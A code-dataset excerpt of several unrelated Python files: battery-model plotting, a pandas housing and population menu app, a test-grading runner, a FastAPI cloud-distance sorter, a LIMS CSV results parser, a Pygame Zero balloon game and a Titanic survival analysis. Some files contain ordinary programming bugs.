Plots are generated for each SOC section in HPPC profile.\n \"\"\"\n coeffs_otc = ecm.curve_fit_coeff(ecm.func_otc, 3)\n coeffs_ttc = ecm.curve_fit_coeff(ecm.func_ttc, 5)\n\n # indices representing start (id2) and end (id4) of curve in each SOC section\n _, _, id2, _, id4 = data.get_idrc()\n\n for i in range(len(id2)):\n start = id2[i]\n end = id4[i]\n t_curve = data.time[start:end]\n v_curve = data.voltage[start:end]\n t_scale = t_curve - t_curve[0]\n\n vfit1 = ecm.func_otc(t_scale, *coeffs_otc[i])\n vfit2 = ecm.func_ttc(t_scale, *coeffs_ttc[i])\n\n fig, ax = plt.subplots()\n ax.plot(t_curve, v_curve, 'C3', marker='.', label='data')\n ax.plot(t_curve, vfit1, label='otc')\n ax.plot(t_curve, vfit2, label='ttc')\n _config(ax, 'Time [s]', 'Voltage [V]', title=f'SOC section {i}', loc='best')\n\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.voltage, 'C3', label='data')\n ax.plot(data.time[id2], data.voltage[id2], 'x', label='id2')\n ax.plot(data.time[id4], data.voltage[id4], 'x', label='id4')\n _config(ax, 'Time [s]', 'Voltage [V]', loc='best')\n\n\ndef plot_v_ecm(data, v_ecm):\n \"\"\"\n Plot HPPC voltage data and ECM voltage. Plot absolute voltage difference\n between HPPC data and ECM.\n \"\"\"\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, data.voltage, 'C3', label='data')\n ax.plot(data.time, v_ecm, 'k--', label='ecm')\n _config(ax, 'Time [s]', 'Voltage [V]', loc='best')\n\n fig, ax = plt.subplots(tight_layout=True)\n ax.plot(data.time, abs(data.voltage - v_ecm))\n _config(ax, 'Time [s]', 'Absolute voltage difference [V]')\n\n\ndef show_plots():\n \"\"\"\n Show all plot figures.\n \"\"\"\n plt.show()\n","sub_path":"ecmlib/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":8713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"386251017","text":"\"\"\"\nCreated on Sep 19, 2021\n\nNote: Requires files Housing.CSV and PopChange.csv!\n\nProgram purpose: Use pandas to read data about housing and population from CSV files.\nPerform data analysis on selected columns and display histograms.\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\npd.set_option('float_format', '{:.2f}'.format)\n\n\ndef population_data():\n \"\"\" menu to analyze population data \"\"\"\n try:\n population = pd.read_csv('PopChange.csv') # read data from population file\n except FileNotFoundError:\n print(\"\\nFile not found.\") # message if file not found\n else:\n print(\"\\nReading population data.\") # message if file read\n dataframe = population.describe() # create a dataframe for pandas analysis\n while True: # display menu\n print(\"\\n1. Pop Apr 1 \\\n \\n2. Pop Jul 1 \\\n \\n3. Change Pop \\\n \\n4. 
Return to main menu\")\n try: # prompt user to input column selection and call functions\n selection = int(input(\"\\nSelect the column you want to analyze: \"))\n if selection == 1:\n display_data(dataframe, 'Pop Apr 1') # analyze selected column\n display_histogram(population, 'Pop Apr 1') # display histogram\n elif selection == 2:\n display_data(dataframe, 'Pop Jul 1') # analyze selected column\n display_histogram(population, 'Pop Jul 1') # display histogram\n elif selection == 3:\n display_data(dataframe, 'Change Pop') # analyze selected column\n display_histogram(population, 'Change Pop') # display histogram\n elif selection == 4:\n break # return to main menu\n else:\n print(\"\\nInvalid selection.\") # message if invalid selection\n except ValueError:\n print(\"\\nInvalid selection.\") # message if invalid input\n\n\ndef housing_data():\n \"\"\" menu to analyze housing data \"\"\"\n try:\n housing = pd.read_csv('Housing.csv') # read housing data from file\n except FileNotFoundError:\n print(\"\\nFile not found.\") # message if file not found\n else:\n print(\"\\nReading housing data.\") # message if file read\n dataframe = housing.describe() # create dataframe for housing analysis\n while True: # display menu to analyze housing data\n print(\"\\n1. Age \\\n \\n2. Bedrooms \\\n \\n3. Built \\\n \\n4. Rooms \\\n \\n5. Utility \\\n \\n6. Return to main menu\")\n try: # prompt user to input column selection and call functions\n selection = int(input(\"\\nSelect the column you want to analyze: \"))\n if selection == 1:\n display_data(dataframe, 'AGE') # analyze selected column\n display_histogram(housing, 'AGE') # display histogram\n elif selection == 2:\n display_data(dataframe, 'BEDRMS') # analyze selected column\n display_histogram(housing, 'BEDRMS') # display histogram\n elif selection == 3:\n display_data(dataframe, 'BUILT') # analyze selected column\n display_histogram(housing, 'BUILT') # display histogram\n elif selection == 4:\n display_data(dataframe, 'ROOMS') # analyze selected column\n display_histogram(housing, 'ROOMS') # display histogram\n elif selection == 5:\n display_data(dataframe, 'UTILITY') # analyze selected column\n display_histogram(housing, 'UTILITY') # display histogram\n elif selection == 6:\n break # return to main menu\n else:\n print(\"\\nInvalid selection.\") # message if invalid selection\n except ValueError:\n print(\"\\nInvalid selection.\") # message if invalid input\n\n\ndef display_data(dataset, column):\n \"\"\" display data from csv files \"\"\"\n print(f'\\nYou selected {column}') # display data analysis for each column\n print(f\"\\nThe statistics for this column are: \\\n \\nCount = {dataset[column]['count']:.0f} \\\n \\nMean = {dataset[column]['mean']:,.2f} \\\n \\nStandard Deviation = {dataset[column]['std']:,.1f} \\\n \\nMin = {dataset[column]['min']:,.0f} \\\n \\nMax = {dataset[column]['max']:,.0f}\")\n\n\ndef display_histogram(dataset, column):\n \"\"\" display histogram for selected column \"\"\"\n print(\"\\nThe histogram for this dataset is: \")\n # format histogram excluding extreme outliers\n dataset[column][dataset[column] < 3.1e6][dataset[column] > -5.3e5].hist()\n plt.suptitle(column) # add super title to histogram\n plt.show() # show histogram\n\n\ndef menu():\n \"\"\" display user menu \"\"\"\n print(\"\\nMenu: \")\n while True:\n try: # select population or housing data\n print((\"\\n1. Population Data \\\n \\n2. Housing Data \\\n \\n3. 
Exit program\"))\n selection = int(input(\"\\nSelect the file you want to analyze: \"))\n if selection == 1:\n population_data() # call function to read population file\n elif selection == 2:\n housing_data() # call function to read housing file\n elif selection == 3:\n print(\"\\nThank you for using the program. Have a nice day!\")\n break # exit program\n else:\n print(\"\\nInvalid selection.\") # message if invalid selection\n except ValueError:\n print(\"\\nInvalid selection.\") # message if invalid input\n\n\n# display welcome message\nprint(\"************ Welcome to the Python Data Analysis App ***********\")\nmenu() # display menu\n","sub_path":"popandhousingdata.py","file_name":"popandhousingdata.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"16610607","text":"import os\nimport subprocess\nimport csv\nfrom collections import defaultdict\n\nreport={}\nques_list = [\"q2\", \"q3\", \"q4\", \"q5\", \"q6\"]\n\nfor q in ques_list:\n os.chdir(q+\"/runner/\")\n for filename in os.listdir(\"exec/\"):\n run_file = filename.split(\"_\")\n run_file = run_file[0]\n f = open(\"reports/\"+run_file+\".txt\", \"w\")\n try:\n subprocess.call([\"exec/\"+filename], stdout=f, timeout=2)\n except subprocess.TimeoutExpired:\n pass\n f.close()\n \n f2 = open(\"cases/\"+run_file+\".txt\", \"w\")\n subprocess.run([\"grep\", \"-c\", \"FAILED\", \"reports/\"+run_file+\".txt\"], stdout=f2)\n f2.close()\n\n f2 = open(\"cases/\"+run_file+\".txt\", \"r\")\n # print(f2.read().split(\"\\n\")[0])\n if (run_file in report):\n report[run_file][q] = f2.read().split(\"\\n\")[0]\n else:\n report[run_file] = {}\n report[run_file][q] = f2.read().split(\"\\n\")[0]\n\n f2.close()\n # break\n # break\n os.chdir(\"../../\")\n \nprint(report)\n\nwith open('report.csv', 'w') as f:\n for entry in report.keys():\n res = [0, 0, 0, 0, 0]\n k = 0\n for q in ques_list:\n if (q in report[entry]):\n res[k] = int(report[entry][q])\n else:\n res[k] = -1\n k += 1\n for i in range(0, len(res)):\n res[i] = str(res[i])\n f.write(\"%s,%s,%s,%s,%s,%s\\n\"%(entry, res[0], res[1], res[2], res[3], res[4]))","sub_path":"4/overall_test.py","file_name":"overall_test.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"33200397","text":"import os\nimport requests\nimport math\nfrom typing import List, Dict, Optional\n\nfrom fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom pydantic import BaseModel\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"http://localhost:1234\"],\n allow_methods=[\"GET\", \"POST\"],\n allow_headers=[\"*\"],\n)\n\nclass Datacenter(BaseModel):\n cloud_description: str\n cloud_name: str\n geo_region: str\n geo_latitude: float\n geo_longitude: float\n distance: Optional[float]\n\nclass CloudModel(BaseModel):\n userLongitude: float\n userLatitude: float\n clouds: List[Datacenter]\n\n@app.get(\"/get_clouds\")\ndef get_all_clouds():\n \"\"\"\n Get all clouds supported by Aiven from their public REST-API\n \"\"\"\n caching_enabled = os.environ.get(\"CACHING_ENABLED\", False)\n if caching_enabled: # and if result is in cache\n pass # would return a cached response here\n\n res = requests.get(\"https://api.aiven.io/v1/clouds\")\n\n return res.json()\n\n\n@app.post(\"/sort_clouds_by_distance\")\ndef sort_clouds(sortClouds: CloudModel):\n\n def 
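# --- Illustrative sketch (not part of the original file) ---
# get_all_clouds() above leaves the CACHING_ENABLED branch as a stub. One
# minimal way to fill it in (a hypothetical design, not the project's actual
# cache) is a module-level dict keyed by URL with a timestamp-based TTL:
import time

_cache: dict = {}
TTL_SECONDS = 300  # assumed cache lifetime

def cached_get(url: str, fetch):
    """Return the cached value for `url`, refreshing via fetch() after the TTL."""
    hit = _cache.get(url)
    if hit and time.time() - hit[0] < TTL_SECONDS:
        return hit[1]
    value = fetch()
    _cache[url] = (time.time(), value)
    return value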
calculate_cloud_distance_from_user(lat1: float, lon1: float, lat2: float, lon2: float) -> float:\n \"\"\"\n Calculates the distance between two points on earth's surface\n given longitude/latitude of those points\n \"\"\"\n dlat = math.radians(lat2 - lat1)\n dlon = math.radians(lon2 - lon1)\n a = (math.sin(dlat / 2) * math.sin(dlat / 2) +\n math.cos(math.radians(lat1)) * math.cos(math.radians(lat2)) *\n math.sin(dlon / 2) * math.sin(dlon / 2))\n c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))\n d = round(6371 * c)\n return d\n\n def sort_clouds_by_nearest_distance(cloud_list: List[Datacenter]) -> List[Datacenter]:\n return sorted(cloud_list, key = lambda i: i.distance)\n\n userLatitude = sortClouds.userLatitude\n userLongitude = sortClouds.userLongitude\n cloud_list = sortClouds.clouds\n\n for cloud in cloud_list:\n cloud.distance = calculate_cloud_distance_from_user(\n userLatitude,\n userLongitude,\n cloud.geo_latitude,\n cloud.geo_longitude\n )\n\n sorted_clouds = sort_clouds_by_nearest_distance(cloud_list)\n return {\"clouds\": sorted_clouds}\n","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"295214505","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\" Beckman Couter Access\n\"\"\"\nfrom datetime import datetime\nfrom bika.lims.exportimport.instruments.resultsimport import \\\n AnalysisResultsImporter, InstrumentCSVResultsFileParser\n\nclass BeckmancoulterAccessCSVParser(InstrumentCSVResultsFileParser):\n def __init__(self, csv):\n InstrumentCSVResultsFileParser.__init__(self, csv)\n self._columns = [] # The different columns names\n self._values = {} # The analysis services from the same resid\n self._resid = '' # A stored resid\n self._rownum = None\n self._end_header = False\n\n def _parseline(self, line):\n sline = line.split(',')\n if len(sline) > 0 and not self._end_header:\n self._columns = sline\n self._end_header = True\n return 0\n elif sline > 0 and self._end_header:\n self.parse_data_line(sline)\n else:\n self.err(\"Unexpected data format\", numline=self._numline)\n return -1\n\n def parse_data_line(self, sline):\n \"\"\"\n Parses the data line and builds the dictionary.\n :param sline: a split data line to parse\n :return: the number of rows to jump and parse the next data line or return the code error -1\n \"\"\"\n # if there are less values founded than headers, it's an error\n if len(sline) != len(self._columns):\n self.err(\"One data line has the wrong number of items\")\n return -1\n rawdict = {}\n for idx, result in enumerate(sline):\n rawdict[self._columns[idx]] = result\n # Getting key values\n resid = rawdict['Sample ID']\n del rawdict['Sample ID']\n testname = rawdict['Test Name']\n del rawdict['Test Name']\n\n # Building the new dict\n rawdict['DefaultResult'] = 'Result'\n rawdict['Remarks'] = rawdict['Comments'].join(rawdict['Interpretation'])\n del rawdict['Comments']\n del rawdict['Interpretation']\n rawdict['DateTime'] = self.csvDate2BikaDate(rawdict['Load Date/Time'])\n self._addRawResult(resid, {testname: rawdict}, False)\n return 0\n\n def csvDate2BikaDate(self, DateTime):\n # example: 11/03/2014 14:46:46 --> %d/%m/%Y %H:%M %p\n Date, Time = DateTime.split(' ')\n dtobj = datetime.strptime(Date + ' ' + Time, \"%d/%m/%Y %H:%M:%S\")\n return dtobj.strftime(\"%Y%m%d %H:%M:%S\")\n\n\nclass BeckmancoulterAccessImporter(AnalysisResultsImporter):\n def __init__(self, parser, context, 
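# --- Illustrative sketch (not part of the original file) ---
# A standalone sanity check of the haversine formula used above. With Earth's
# mean radius of 6371 km, London -> Paris should come out at roughly 340 km:
import math

def haversine_km(lat1, lon1, lat2, lon2):
    dlat = math.radians(lat2 - lat1)
    dlon = math.radians(lon2 - lon1)
    a = (math.sin(dlat / 2) ** 2 +
         math.cos(math.radians(lat1)) * math.cos(math.radians(lat2)) *
         math.sin(dlon / 2) ** 2)
    return round(6371 * 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a)))

print(haversine_km(51.5074, -0.1278, 48.8566, 2.3522))  # ~343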
idsearchcriteria, override,\n allowed_ar_states=None, allowed_analysis_states=None,\n instrument_uid=None):\n AnalysisResultsImporter.__init__(self, parser, context,\n idsearchcriteria, override,\n allowed_ar_states,\n allowed_analysis_states,\n instrument_uid)\n","sub_path":"bika/lims/exportimport/instruments/beckmancoulter/access/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"232902109","text":"import pgzrun\nimport random\n\nWIDTH = 1280\nHEIGHT = 960\nCENTRE = WIDTH/2, HEIGHT/2\nFONT_COLOUR = (255, 255, 255)\nSPEED = 2\nSPEEDBALOON = 8\n\nspieler = Actor(\"spieler\")\nspieler.pos = WIDTH/2, HEIGHT/2\nspieler_leben = 3\n\ngegnerId = random.randint(2, 3)\ngegner = Actor(\"spieler\" + str(gegnerId))\ngegner.pos = WIDTH/4, HEIGHT/4\ngegner_leben = 3\n\nspeed_gegner_x = 0\nspeed_gegner_y = 0\nwasserbombe_rot = Actor(\"wasserbombe_rot\")\nwasserbombe_rot.pos = spieler.pos[0]+20, spieler.pos[1]+10\n\nwasserbombe_rot2 = Actor(\"wasserbombe_rot\")\nwasserbombe_rot2.pos = gegner.pos[0]+20, gegner.pos[1]+10\n\nwurf = False\nwurf_gegner = False\nwurf_pos = spieler.pos\ndx = 0\ndy = 0\nspace_vorher = False\n\nneues_leben = Actor(\"herz3\")\nneues_leben_sichtbar = False\nx_neues_leben = -10\ny_neues_leben = -10\nneues_leben.pos = x_neues_leben, y_neues_leben\n\n# Das ist die Funktion zum Zeichnen\ndef draw():\n if spieler_leben > 0 and gegner_leben > 0:\n screen.fill((0, 0, 255))\n spieler.draw()\n gegner.draw()\n wasserbombe_rot.draw()\n wasserbombe_rot2.draw()\n screen.draw.text(\"Spieler\", color=FONT_COLOUR, topleft=(10, 10))\n x_herz = 10\n for l in range(1, spieler_leben+1):\n screen.blit('herz', (x_herz, 30))\n x_herz += 60\n screen.draw.text(\"Gegner\", color=FONT_COLOUR, topleft=(1100, 10))\n x_herz_gegner = 1100\n for l in range(1, gegner_leben+1):\n screen.blit('herz', (x_herz_gegner, 30))\n x_herz_gegner += 60\n if neues_leben_sichtbar:\n neues_leben.draw()\n elif gegner_leben <= 0:\n screen.fill((0, 255, 0))\n screen.draw.text(\"Du hast gewonnen!\", fontsize=60, center=(WIDTH/2, HEIGHT/2), color=FONT_COLOUR)\n screen.draw.text(\"Drücke ESC, um neu zu starten.\", center=(WIDTH/2, 4*HEIGHT/7), color=FONT_COLOUR)\n else:\n screen.fill((255, 0, 0))\n screen.draw.text(\"Du hast verloren!\", fontsize=60, center=(WIDTH/2, HEIGHT/2), color=FONT_COLOUR)\n screen.draw.text(\"Drücke ESC, um neu zu starten.\", center=(WIDTH/2, 4*HEIGHT/7), color=FONT_COLOUR)\n\n\ndef update():\n global wurf\n global wurf_gegner\n global dx\n global dy\n global spieler_leben\n global gegner_leben\n global space_vorher\n global neues_leben\n global neues_leben_sichtbar\n \n # Bewege Spieler \n if keyboard.left:\n spieler.x -= SPEED\n\n if keyboard.right:\n spieler.x += SPEED\n\n if keyboard.up:\n spieler.y -= SPEED\n\n if keyboard.down:\n spieler.y += SPEED\n\n if keyboard.ESCAPE:\n if (spieler_leben <= 0 or gegner_leben <= 0):\n spieler_leben = 3\n gegner_leben = 3\n spieler.pos = WIDTH/2, HEIGHT/2\n gegner.pos = WIDTH/4, HEIGHT/4\n wurf_gegner = False\n wurf = False\n\n # Bewege Gegner \n gegner.x += speed_gegner_x\n gegner.y += speed_gegner_y\n \n\n # Löse Wurf aus\n if keyboard.space and not space_vorher:\n wurf = True\n space_vorher = keyboard.space\n\n # Ermittle Flugrichtung, falls noch nicht geworfen wurde (Bewegungsrichtung Spieler)\n if wurf == False:\n if keyboard.left:\n dx = -SPEEDBALOON\n elif keyboard.right:\n dx = SPEEDBALOON\n else:\n dx = 0\n if keyboard.up:\n dy 
= -SPEEDBALOON\n elif keyboard.down:\n dy = SPEEDBALOON\n else:\n dy = 0\n # Platziere Wasserbombe neben Spieler\n wasserbombe_rot.pos = spieler.pos[0]+20, spieler.pos[1]+10\n else:\n # Bewege Wasserbombe\n wasserbombe_rot.pos = wasserbombe_rot.pos[0]+dx, wasserbombe_rot.pos[1]+dy\n if wasserbombe_rot.collidepoint(gegner.pos):\n gegner_leben -= 1\n wurf = False\n\n # Falls der Rand getroffen wird, setze die Wasserbombe zurück (Position neben Spieler)\n if wasserbombe_rot.pos[0] < 0 or wasserbombe_rot.pos[0] > WIDTH or wasserbombe_rot.pos[1] < 0 or wasserbombe_rot.pos[1] > HEIGHT or (dx == 0 and dy == 0):\n wasserbombe_rot.pos = spieler.pos[0]+20, spieler.pos[1]+10\n dx = 0\n dy = 0\n wurf = False\n\n # Wasserbombe Gegner\n if wurf_gegner == False:\n wasserbombe_rot2.pos = gegner.pos[0]+20, gegner.pos[1]+10\n else:\n if wasserbombe_rot2.collidepoint(spieler.pos):\n spieler_leben -= 1\n wurf_gegner = False\n\n if neues_leben_sichtbar == True and neues_leben.collidepoint(spieler.pos):\n neues_leben_sichtbar = False\n clock.schedule(erzeuge_herz, 3.0)\n if spieler_leben < 3:\n spieler_leben += 1\n \nif neues_leben_sichtbar == True and neues_leben.collidepoint(gegner.pos):\n neues_leben_sichtbar = False\n clock.schedule(erzeuge_herz, 3.0)\n if gegner_leben < 3:\n gegner_leben += 1\n \n# Berechne eine zufällige Bewegungsrichtung für den Gegner\ndef aendere_bewegungsrichtung_gegner():\n global speed_gegner_x\n global speed_gegner_y\n global gegner\n speed_gegner_x = random.randint(-SPEED, SPEED)\n speed_gegner_y = random.randint(-SPEED, SPEED)\n if((gegner.x < 100 and speed_gegner_x < 0) or (gegner.x>WIDTH-100 and speed_gegner_x > 0)):\n speed_gegner_x = -speed_gegner_x\n if((gegner.y < 100 and speed_gegner_y < 0) or (gegner.y>HEIGHT-100 and speed_gegner_y > 0)):\n speed_gegner_y = -speed_gegner_y\n clock.schedule(aendere_bewegungsrichtung_gegner, 1.0)\n\n\ndef ruecksetzen_wasserbombe_gegner():\n global wurf_gegner\n wurf_gegner = False\n \n\ndef werfe_wasserbombe_gegner():\n global wurf_gegner\n global wurf_pos\n dx = spieler.x - gegner.x\n dy = spieler.y - gegner.y\n wurf_pos = gegner.pos[0] + dx * 1.5, gegner.pos[1] + dy * 1.5\n wurf_gegner = True\n animate(wasserbombe_rot2, tween='linear', pos=wurf_pos, duration=1.2, on_finished=ruecksetzen_wasserbombe_gegner)\n clock.schedule(werfe_wasserbombe_gegner, 5.0)\n\n\ndef erzeuge_herz():\n global neues_leben\n global neues_leben_sichtbar\n neues_leben_sichtbar = True\n x_neues_leben = random.randint(0, WIDTH)\n y_neues_leben = random.randint(0, HEIGHT)\n neues_leben.pos = x_neues_leben, y_neues_leben\n \n\naendere_bewegungsrichtung_gegner()\nclock.schedule(werfe_wasserbombe_gegner, 5.0)\nclock.schedule(erzeuge_herz, 1.0)\n\npgzrun.go()\n","sub_path":"worldofwarriors/World of warriors.py","file_name":"World of warriors.py","file_ext":"py","file_size_in_byte":6498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"193256632","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef show_statistics(x):\n # print(x.head())\n # print(x.describe())\n # print(x.info())\n # print(x.describe(include=['O']))\n\n # fill NaN for Age\n x.loc[x['Age'].isnull(), 'Age'] = x['Age'].mean()\n # x.loc[:, 'Age'] = x['Age'].fillna(x['Age'].mean())\n\n # 各年齡層的男女人數:圖形化\n fig = plt.figure(figsize=(15, 8))\n plt.hist([x[x['Sex'] == 'male']['Age'], x[x['Sex'] == 'female']['Age']], stacked=False, color=['g', 'r'], bins=30,\n label=['Male', 'Female'])\n plt.xlabel('Age')\n plt.ylabel('Number 
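# --- Illustrative sketch (not part of the original file) ---
# The age imputation above assigns through .loc with an isnull() mask; the
# commented-out fillna() line next to it is the more idiomatic equivalent.
# On a toy frame:
import numpy as np
import pandas as pd

x = pd.DataFrame({'Age': [22.0, np.nan, 38.0, np.nan]})
x['Age'] = x['Age'].fillna(x['Age'].mean())  # NaNs -> 30.0, other values untouched
print(x['Age'].tolist())                     # [22.0, 30.0, 38.0, 30.0]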
of Sex')\n plt.legend()\n\n # 以人數比例來看不同性別的存活率\n print(x[['Sex', 'Survived']].groupby(['Sex'], as_index=False).mean().sort_values(by='Survived', ascending=False))\n # 圖形化\n survived_sex = x[x['Survived'] == 1]['Sex'].value_counts()\n dead_sex = x[x['Survived'] == 0]['Sex'].value_counts()\n df = pd.DataFrame([survived_sex, dead_sex])\n df.index = ['Survived', 'Dead']\n # df.plot(kind='bar', stacked=True, figsize=(15, 8))\n\n # 以人數來看不同性別的存活率:圖形化\n total_sex = x['Sex'].value_counts()\n p_survived_sex = x[x['Survived'] == 1]['Sex'].value_counts() / total_sex\n p_dead_sex = x[x['Survived'] == 0]['Sex'].value_counts() / total_sex\n df = pd.DataFrame([p_survived_sex, p_dead_sex])\n df.index = ['Survived', 'Dead']\n # df.plot(kind='bar', stacked=True, figsize=(15, 8))\n\n # 統計姓名裡的稱謂總人數與其年齡的平均數\n for title in ['Mr.', 'Sir.', 'Dr.', 'Major.', 'Master.']:\n num = x[(x['Name'].str.contains(title))]['Name'].count()\n age = x[(x['Name'].str.contains(title))]['Age'].mean()\n print('{} – > {} males, Age average is {}'.format(title, num, age))\n print('-----------------------')\n for title in ['Ms.', 'Miss.', 'Mrs.', 'Lady.']:\n num = x[(x['Name'].str.contains(title))]['Name'].count()\n age = x[(x['Name'].str.contains(title))]['Age'].mean()\n print('{} – > {} females, Age average is {}'.format(title, num, age))\n print('=======================')\n\n # 統計某稱謂的總人數、存活人數、死亡人數、存活率\n for title in ['Mr.', 'Sir.', 'Dr.', 'Major.', 'Master.']:\n num_survived = x[(x['Survived'] == 1) & (x['Name'].str.contains(title))]['Name'].count()\n num_died = x[(x['Survived'] == 0) & (x['Name'].str.contains(title))]['Name'].count()\n print('{} total:{} – > {} survived, {} died. {:.3f}% survived'.format(title, num_survived + num_died,\n num_survived,\n num_died, (100 * num_survived / (\n num_survived + num_died))))\n print('-----------------------')\n for title in ['Ms.', 'Miss.', 'Mrs.', 'Lady.']:\n num_survived = x[(x['Survived'] == 1) & (x['Name'].str.contains(title))]['Name'].count()\n num_died = x[(x['Survived'] == 0) & (x['Name'].str.contains(title))]['Name'].count()\n print('{} total:{} – > {} survived, {} died. 
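# --- Illustrative sketch (not part of the original file) ---
# One subtlety in the title counts above: str.contains() treats its pattern as
# a regex by default, so the '.' in 'Mr.' matches any character and the pattern
# also hits 'Mrs.'. Passing regex=False makes the match literal:
import pandas as pd

names = pd.Series(['Smith, Mr. John', 'Smith, Mrs. Jane'])
print(names.str.contains('Mr.').sum())               # 2 -- '.' matches the 's' in 'Mrs'
print(names.str.contains('Mr.', regex=False).sum())  # 1 -- literal substring match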
{:.3f}% survived'.format(title, num_survived + num_died,\n num_survived,\n num_died, (100 * num_survived / (\n num_survived + num_died))))\n print('=======================')\n\n # 從人數來看不同船票等級的存活率:圖形化\n survived_pclass = x[x['Survived'] == 1]['Pclass'].value_counts()\n dead_pclass = x[x['Survived'] == 0]['Pclass'].value_counts()\n df = pd.DataFrame([survived_pclass, dead_pclass])\n df.index = ['Survived', 'Dead']\n # df.plot(kind='bar', stacked=False, figsize=(15, 8))\n\n # 從人數比例來看不同船票等級的存活率\n print(x[['Pclass', 'Survived']].groupby(['Pclass'], as_index=False).mean().sort_values(by='Survived',\n ascending=False))\n print('=======================')\n\n # 不同船票等級與性別對於存活率的影響\n print(x[['Pclass', 'Sex', 'Survived']].groupby(['Pclass', 'Sex'], as_index=False).mean().sort_values(\n by='Survived', ascending=False))\n print('=======================')\n\n # 不同船票等級與性別對於存活率的影響:圖形化(女性)\n total_female_p1 = x[(x['Pclass'] == 1) & (x['Sex'] == \"female\")]['Survived'].count()\n female_p1 = x[(x['Pclass'] == 1) & (x['Sex'] == \"female\")]['Survived'].value_counts() / total_female_p1\n total_female_p2 = x[(x['Pclass'] == 2) & (x['Sex'] == \"female\")]['Survived'].count()\n female_p2 = x[(x['Pclass'] == 2) & (x['Sex'] == \"female\")]['Survived'].value_counts() / total_female_p2\n total_female_p3 = x[(x['Pclass'] == 3) & (x['Sex'] == \"female\")]['Survived'].count()\n female_p3 = x[(x['Pclass'] == 3) & (x['Sex'] == \"female\")]['Survived'].value_counts() / total_female_p3\n df = pd.DataFrame([female_p1[[0, 1]], female_p2[[0, 1]], female_p3[[0, 1]]])\n df.index = ['Female in P1', 'Female in P2', 'Female in P3']\n df.plot(kind='bar', stacked=False, figsize=(15, 8))\n\n # 不同年齡層的存亡人數:圖形化\n plt.figure(figsize=(15, 8))\n plt.hist([x[x['Survived'] == 1]['Age'], x[x['Survived'] == 0]['Age']], stacked=True, color=['g', 'r'], bins=30,\n label=['Survived', 'Dead'])\n plt.xlabel('Age')\n plt.ylabel('Number of passengers')\n plt.legend()\n\n # 親屬人數對存活率的影響\n x_with_family = x.copy()\n x_with_family['Family'] = x['SibSp'] + x['Parch']\n print(x_with_family[['Family', 'Survived']].groupby(['Family'], as_index=False).mean().sort_values(\n by='Survived', ascending=False))\n # print('=======================')\n\n # 上岸港口對存活率的影��\n x[['Embarked', 'Survived']].groupby(['Embarked'], as_index=False).mean().sort_values(by='Survived', ascending=False)\n # print('=======================')\n\n # 上岸港口對存活率的影響:圖形化\n total_Embarked_S = x[x['Embarked'] == 'S']['Survived'].count()\n total_Embarked_C = x[x['Embarked'] == 'C']['Survived'].count()\n total_Embarked_Q = x[x['Embarked'] == 'Q']['Survived'].count()\n Embarked_S = x[x['Embarked'] == 'S']['Survived'].value_counts() / total_Embarked_S\n Embarked_C = x[x['Embarked'] == 'C']['Survived'].value_counts() / total_Embarked_C\n Embarked_Q = x[x['Embarked'] == 'Q']['Survived'].value_counts() / total_Embarked_Q\n df = pd.DataFrame([Embarked_S, Embarked_C, Embarked_Q])\n df.index = ['Southampton', 'Cherbourg', 'Queenstown']\n # df.plot(kind='bar', stacked = False, figsize = (15, 8))\n\n # 上岸港口與船票等級的關係\n total_Pclass_S = x[x['Embarked'] == 'S']['Pclass'].count()\n total_Pclass_C = x[x['Embarked'] == 'C']['Pclass'].count()\n total_Pclass_Q = x[x['Embarked'] == 'Q']['Pclass'].count()\n Embarked_S = x[x['Embarked'] == 'S']['Pclass'].value_counts() / total_Pclass_S\n Embarked_C = x[x['Embarked'] == 'C']['Pclass'].value_counts() / total_Pclass_C\n Embarked_Q = x[x['Embarked'] == 'Q']['Pclass'].value_counts() / total_Pclass_Q\n df = pd.DataFrame([Embarked_S, Embarked_C, Embarked_Q])\n df.index = 
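# --- Illustrative sketch (not part of the original file) ---
# The Pclass x Sex survival table produced by groupby above can also be laid
# out as a grid with pivot_table, which is often easier to read:
import pandas as pd

x = pd.DataFrame({'Pclass':   [1, 1, 3, 3],
                  'Sex':      ['female', 'male', 'female', 'male'],
                  'Survived': [1, 0, 1, 0]})
print(x.pivot_table(values='Survived', index='Pclass', columns='Sex', aggfunc='mean'))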
['Southampton', 'Cherbourg', 'Queenstown']\n # df.plot(kind='bar', stacked=False, figsize=(15, 8))\n\n # plt.show()\n\n\n# used for MLP\ndef show_train_history(train_history, train_acc, validation_acc, ylabel):\n plt.plot(train_history.history[train_acc])\n plt.plot(train_history.history[validation_acc])\n epoch_num = len(train_history.epoch)\n final_epoch_train_acc = train_history.history[train_acc][epoch_num - 1]\n final_epoch_validation_acc = train_history.history[validation_acc][epoch_num - 1]\n plt.text(epoch_num, final_epoch_train_acc, 'train = {:.3f}'.format(final_epoch_train_acc))\n plt.text(epoch_num, final_epoch_validation_acc-0.01, 'valid = {:.3f}'.format(final_epoch_validation_acc))\n plt.title('Train History')\n plt.ylabel(ylabel)\n plt.xlabel('Epoch')\n plt.xlim(xmax=epoch_num+1)\n plt.legend(['train', 'validation'], loc='upper left')\n fig = plt.gcf()\n fig.savefig('./mlp_train_{}.png'.format(ylabel), dpi=100)\n plt.clf()\n # 